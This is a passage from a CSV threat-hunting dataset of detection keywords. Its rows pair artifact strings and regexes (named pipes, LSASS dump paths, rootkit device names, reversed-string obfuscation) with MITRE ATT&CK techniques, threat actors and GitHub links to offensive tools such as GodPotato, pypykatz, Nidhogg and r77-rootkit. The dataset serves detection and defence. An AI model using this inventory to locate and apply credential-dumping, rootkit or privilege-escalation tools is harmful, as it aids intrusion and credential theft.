Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13644" "*\\\\.\\pipe\\warpzone8*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\warpzone8.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","#namedpipe","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","13645" "*\\\\{attacker_ip}\\*",".{0,1000}\\\\\\\\\{attacker_ip\}\\\\.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13646" "*\\\\{coerce_to}\\*",".{0,1000}\\\\\\\\\{coerce_to\}\\\\.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13647" "*\\\\127.0.0.1\\pipe\\warpzone8*",".{0,1000}\\\\\\\\127\.0\.0\.1\\\\pipe\\\\warpzone8.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","#namedpipe","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","13648" "*\\127.0.0.1\c$*",".{0,1000}\\\\127\.0\.0\.1\\c\$.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","13649" "*\\ataDmargorP\\:C*",".{0,1000}\\\\ataDmargorP\\\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","13650" "*\\c$\Windows\Temp\*.dmp*",".{0,1000}\\\\c\$\\Windows\\Temp\\.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential 
Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","13651" "*\\DCSC_stdInPipe*",".{0,1000}\\\\DCSC_stdInPipe.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","13652" "*\\DCSC_stdOutPipe*",".{0,1000}\\\\DCSC_stdOutPipe.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","13653" "*\\Debug\\Injected.dll*",".{0,1000}\\\\Debug\\\\Injected\.dll.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","13654" "*\\DESKTOP-PRINTINGFUN*",".{0,1000}\\\\DESKTOP\-PRINTINGFUN.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - 
TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","13655" "*\\Device\\NamedPipe\\NamedPipeMaster*",".{0,1000}\\\\Device\\\\NamedPipe\\\\NamedPipeMaster.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#namedpipe","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","13656" "*\\Device\\Nidhogg*",".{0,1000}\\\\Device\\\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","13657" "*\\Device\\Nidhogg*",".{0,1000}\\\\Device\\\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - 
T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","13658" "*\\Device\\StealToken*",".{0,1000}\\\\Device\\\\StealToken.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","13659" "*\\Driver\\Nidhogg*",".{0,1000}\\\\Driver\\\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - 
T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","13660" "*\\Edge\\Usedx765er Data*",".{0,1000}\\\\Edge\\\\Usedx765er\sData.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","13661" "*\\GetWebDAVStatus.exe*",".{0,1000}\\\\GetWebDAVStatus\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - 
Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","13662" "*\\HackSysExtremeVulnerableDriver*",".{0,1000}\\\\HackSysExtremeVulnerableDriver.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","13663" "*\\localhost/pipe/petit\*",".{0,1000}\\\\localhost\/pipe\/petit\\.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13664" "*\\Locedx765al Staedx765te*",".{0,1000}\\\\Locedx765al\sStaedx765te.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara 
scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","13665" "*\\MiniDump\\Decryptor\\Credman*",".{0,1000}\\\\MiniDump\\\\Decryptor\\\\Credman.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#content","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","13667" "*\\MiniDump\\Decryptor\\KerberosSessions*",".{0,1000}\\\\MiniDump\\\\Decryptor\\\\KerberosSessions.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#content","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","13668" "*\\MiniDump\\Decryptor\\LogonSessions*",".{0,1000}\\\\MiniDump\\\\Decryptor\\\\LogonSessions.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#content","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","13669" "*\\pipe\\$77control*",".{0,1000}\\\\pipe\\\\\$77control.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","13670" "*\\pipe\\DAV RPC SERVICE*",".{0,1000}\\\\pipe\\\\DAV\sRPC\sSERVICE.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on 
a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","#namedpipe","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","13671" "*\\pipe\\GodPotato*",".{0,1000}\\\\pipe\\\\GodPotato.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#namedpipe","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","13672" "*\\pipe\\moj_ML_ntsvcs*",".{0,1000}\\\\pipe\\\\moj_ML_ntsvcs.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","#namedpipe","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","13673" "*\\pipe\\MyNamePipe*",".{0,1000}\\\\pipe\\\\MyNamePipe.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","#namedpipe","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","13674" "*\\pipe\\petit\\pipe\\srvsvc*",".{0,1000}\\\\pipe\\\\petit\\\\pipe\\\\srvsvc.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#namedpipe","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13676" "*\\pipe\\RustPotato*",".{0,1000}\\\\pipe\\\\RustPotato.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","0","#content 
#namedpipe","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","13677" "*\\pipe\\SigmaPotato*",".{0,1000}\\\\pipe\\\\SigmaPotato.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#namedpipe","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","13678" "*\\PPLmedic\\ntstuff*",".{0,1000}\\\\PPLmedic\\\\ntstuff.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","13679" "*\\Public\\panda.raw*",".{0,1000}\\\\Public\\\\panda\.raw.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","13680" "*\\Public\\simpleMDWD.raw*",".{0,1000}\\\\Public\\\\simpleMDWD\.raw.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","13681" "*\\Public\\sysMDWD.file*",".{0,1000}\\\\Public\\\\sysMDWD\.file.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","13682" 
"*\\Release\\Injected.dll*",".{0,1000}\\\\Release\\\\Injected\.dll.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","13683" "*\\saint.jar*",".{0,1000}\\\\saint\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","13685" "*\\stub\\COFFLoader.bin*",".{0,1000}\\\\stub\\\\COFFLoader\.bin.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","13686" "*\\swodniW\\:C*",".{0,1000}\\\\swodniW\\\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","13687" "*\\system32\\msf.sys*",".{0,1000}\\\\system32\\\\msf\.sys.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - 
TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","13688" "*\\temp\\Injected.dll*",".{0,1000}\\\\temp\\\\Injected\.dll.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","13689" "*\\Users\\Fantastic\\Desktop\\DEMO\\plugins\\scripts\\*",".{0,1000}\\\\Users\\\\Fantastic\\\\Desktop\\\\DEMO\\\\plugins\\\\scripts\\\\.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","13690" "*\\Users\\Public\\quran.txt*",".{0,1000}\\\\Users\\\\Public\\\\quran\.txt.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","13691" "*\\windows\\temp\\123.exe*",".{0,1000}\\\\windows\\\\temp\\\\123\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - 
T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","13692" "*\\windows\\temp\\lsass.dmp*",".{0,1000}\\\\windows\\\\temp\\\\lsass\.dmp.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","0","#content","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","13693" "*\\windows\\temp\\lsass.dmp*",".{0,1000}\\\\windows\\\\temp\\\\lsass\.dmp.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#content","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","13694" "*\\Windows\\temp\\payload.exe*",".{0,1000}\\\\Windows\\\\temp\\\\payload\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
